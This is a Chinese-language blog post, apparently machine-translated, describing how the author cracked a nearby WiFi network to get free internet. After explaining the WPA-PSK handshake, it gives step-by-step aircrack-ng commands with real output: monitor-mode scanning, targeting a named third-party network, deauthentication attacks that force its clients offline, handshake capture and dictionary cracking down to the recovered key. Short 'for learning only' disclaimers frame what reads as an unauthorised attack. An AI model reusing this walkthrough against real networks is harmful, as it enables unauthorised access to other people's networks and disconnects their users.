banner
毅种循环

毅种循环

头顶铁锅接收宇宙能量
首頁封存关于

我偷他的網

#渗透测试#近源158
AI 翻譯
這篇文章透過AI由簡體中文翻譯成繁體中文查看原文
AI 生成的摘要
本文提供了关于如何破解WiFi密码的技术说明。文章强调了仅供技术学习交流使用,不鼓励非法行为。文章列举了进行WiFi破解所需的材料和技术原理,包括WiFi认证和WPA-PSK认证的过程。文章还介绍了使用字典进行破解的原理和步骤。最后,文章提供了启动网卡、激活监听模式和探测周围无线网络的操作指南。

#

本文章僅作為技術學習交流,請不要隨意拿鄰居開刀。

提前準備#

你需要如下材料

  • 一個支持監聽的無線網卡設備
  • 一個強大的 WiFi 字典
  • 一個有 WiFi 的地方

最近流量不夠用了,想着偷個網試試,看了一下周邊的 WiFi 佈局。。
image
還是有一些 WIFI 設備的,然後開始嘗試能不能搞一個來。

技術原理#

WiFi 認證#

大家都知道 WiFi 大略是有四種支持格式的,
1、不啟用安全
2、WEP
3、WPA/WPA2-PSK
4、WPA/WPA2 802.1X (radius 認證)
一般我們設置的都是第三種。

WPA-PSK 的認證過程#

image
1、無線 AP 定期發送 beacon 數據包,使無線終端更新自己的無線網絡列表。
2、無線終端在每個信道(1-13)廣播 ProbeRequest(非隱藏類型的 WiFi 含 ESSID,隱藏類型的 WiFi 不含 ESSID)
3、每個信道的 AP 回應,ProbeResponse,包含 ESSID,及 RSN 信息
4、無線終端給目標 AP 發送 AUTH 包。AUTH 認證類型有兩種,0 為開放式、1 為共享式(WPA/WPA2 必須是開放式)
5、AP 回應網卡 AUTH 包
6、無線終端給 AP 發送關聯請求包 associationrequest 數據包 7、AP 給無線終端發送關聯響應包 associationresponse 數據包
8、EAPOL 四次握手進行認證(握手包是破解的關鍵)
9、完成認證可以上網。

WPA-PSK 認證四次握手認證的過程#

image

WPA-PSK 破解原理#

用我們字典中的 PSK+ssid 先生成 PMK(此步最耗時,是目前破解的瓶頸所在),然後結合握手包中的客戶端 MAC,AP 的 BSSID,A-NONCE,S-NONCE 計算 PTK,再加上原始的報文數據算出 MIC 並與 AP 發送的 MIC 比較,如果一致,那麼該 PSK 就是密鑰。
如圖所示:
image
所以還是爆破握手包的方式來獲得密碼,由於是通過暴力破解方式破解 Wifi 密碼,所以你需要下載一些強大的字典,字典可以直接在 Github 上搜索,或者直接 google。

開偷#

啟動網卡#

我這裡使用的是 Kali,插入無線網卡的時候請選擇和虛擬機相連。

ifconfig-a /此命令查看所有網絡設備器

image
如果你的連接沒有出錯,此時應該會有一張名為wlan0的網卡設備。
接著使用命令,激活這張網卡,如果不回顯則開啟成功。

ifconfig wlan0 up

激活網卡為監聽(monitor)模式#

airmon-ng start wlan0

image
同時,你的無線網卡應該會有指示燈之類的亮起(看型號,是否啟用成功還是看上圖結果)
得到監控模式下的設備名是 wlan0mon,請記住這個名字,後續有用。

探測周圍無線網絡#


我現在連接的是我自己的手機熱點,插入無線網卡後開始嗅探周圍的 WIFI 設備。

airodump-ng wlan0mon

查看周邊路由 AP 的信息。
個人經驗一般信號強度大於 - 70 的可以進行破解,大於 - 60 就最好了,小於 - 70 的不穩定,信號比較弱。(信號強度的絕對值越小表示信號越強)
image
這裡我們將會對 游走老火鍋 這個 WiFi 進行攻擊,所以我們需要記錄下對應的 BSSID 以及 CH ,這兩個值分別是 WiFi 唯一標識和信道。 建議選擇 PWR 較小的 WiFi,因為這意味著信號較好。
如果要弄懂這些參數都是什么,我貼兩張網上的圖:
image
image
image

選擇要破解的 WiFi,有針對性的進行抓握手包#

airodump-ng wlan0mon -c 7 --bssid 14:75:90:9E:29:8E

其中的 -c 參數代表了信道號, --bssid 代表此 WiFi 的唯一標識。
執行後等待一會,輸出結果如下:

fundamental     CH 7 ][ Elapsed: 6 s ][ 2021-04-07 23:41
      BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
      14:75:90:9E:29:8E  -37   1       89     4294  299  11  270   WPA2 CCMP   PSK  203
      BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
      14:75:90:9E:29:8E  48:7D:2E:B3:04:DF  -29    0 - 1e     0        7
      14:75:90:9E:29:8E  E0:DC:FF:DC:5A:89  -40    0 - 0e   817     4259
      14:75:90:9E:29:8E  80:ED:2C:10:0D:8A  -63    0 -24      0        2
      14:75:90:9E:29:8E  FA:83:C4:C0:8F:DF  -60    0e-24     88       88

從這個輸出結果我們可以分析到的數據:

  • 當前連接此 WiFi 的設備有 4 台,以及每台設備的唯一標識,發包數等。 下面的四行也就代表了四台設備,我們需要記錄 Lost 有變化的設備標識,這裡我們選擇標識為 E0:DC:FF:DC:5A:89 的設備。

好的,目前我們掌握了幾條有用的信息,如下:
WiFi 唯一標識 14:75:90:9E:29:8E
連接 WiFi 的設備之一的標識 E0:DC:FF:DC:5A:89
WiFi 的信道 11

監聽握手包#

下面我們需要根據以上信息進行抓包,嘗試拿到包含密鑰的握手包。

airodump-ng wlan0mon --bssid 14:75:90:9E:29:8E -c 11 -w 203

參數說明:-w 保存數據包的文件名 –c 信道 –bssid ap 的 mac 地址 (注意 test.cap 會被重命名),也可以用其他工具抓包比如:wireshark、tcpdump,抓到握手包會有提示。

airodump-ng --ivs --bssid E6:9A:DC:79:7:EC -w longas -c 1 wlan0mon**

PS:我建議使用這條作為監聽,–ivs 這裡的設置是通過過濾,不再將所有的無線數據保存,而只是保存可用於破解的 IVS 數據報文,這樣可以有效地縮減保存的數據包大小。如果按照第一個語句去監聽,不過濾請求的話會有很多額外的請求,後續的圖我將以這條語句作為演示。

監聽的時候如果有設備登錄成功就會抓到握手包,那麼此時客戶端不一定有會有登錄的包發送給服務端,怎麼樣去抓到這個帶有認證請求的包呢,很簡單,強行使客戶端斷開即可。

執行斷網攻擊獲得握手包#

下面我們需要利用 Aireplay-ng 進行斷網攻擊,當用戶重連 WiFi 時 Airodump-ng 應該就能拿到密鑰的數據包了。

aireplay-ng wlan0mon -0 10 -a 14:75:90:9E:29:8E -c E0:DC:FF:DC:5A:89

這裡的 -0 代表攻擊次數,後面的 10 也就是攻擊次數、 -a 代表要攻擊的 WiFi、 -c 代表要攻擊的已連接 WiFi 的設備。
此命令的輸出結果如下:

fundamental     23:55:26  Waiting for beacon frame (BSSID: 14:75:90:9E:29:8E) on channel 11
     23:55:28  Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [27| 1 ACKs]
     23:55:29  Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [ 3| 1 ACKs]
     23:55:30  Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [ 2| 6 ACKs]
     23:55:32  Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [ 8| 7 ACKs]
     23:55:34  Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [ 7| 7 ACKs]
     23:55:36  Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [ 7|14 ACKs]
     23:55:39  Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [34| 3 ACKs]
     23:55:41  Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [22| 6 ACKs]
     23:55:43  Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [ 5| 5 ACKs]
     23:55:45  Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [10| 6 ACKs]

如果這種方式多次失敗,可以嘗試去掉 -c 參數,進行範圍打擊,對每個設備都進行攻擊,這樣拿到加密包的機率也會有提升。
airodump-ng 那邊提示拿到 WPA handshake 即代表拿到加密握手包,也就不需要斷網攻擊了。
image
我實踐中使用是把整個客戶端打掉線讓他們重連的。
image
當這邊的 shell 提示 WPA handshake 就說明獲取到握手包了,可以停止了。

CH 11 ][ Elapsed: 6 mins ][ 2021-04-08 00:05 ][ WPA handshake: 14:75:90:9E:29:8E

字典破解#

下面我們通過準備的字典以及拿到的握手包進行暴力破解。
執行如下命令進行破解

aircrack-ng -w common.txt 203.ivs

-w 是我們的字典, 203-01.cap 是我們拿到的密鑰握手包。
我這個運氣不錯,密碼相對簡單。
image

KEY FOUND! [99998888] 即是密碼。
image

最後#

請善待你的鄰居,不要隨意拿鄰居開刀。


載入中......
此文章數據所有權由區塊鏈加密技術和智能合約保障僅歸創作者所有。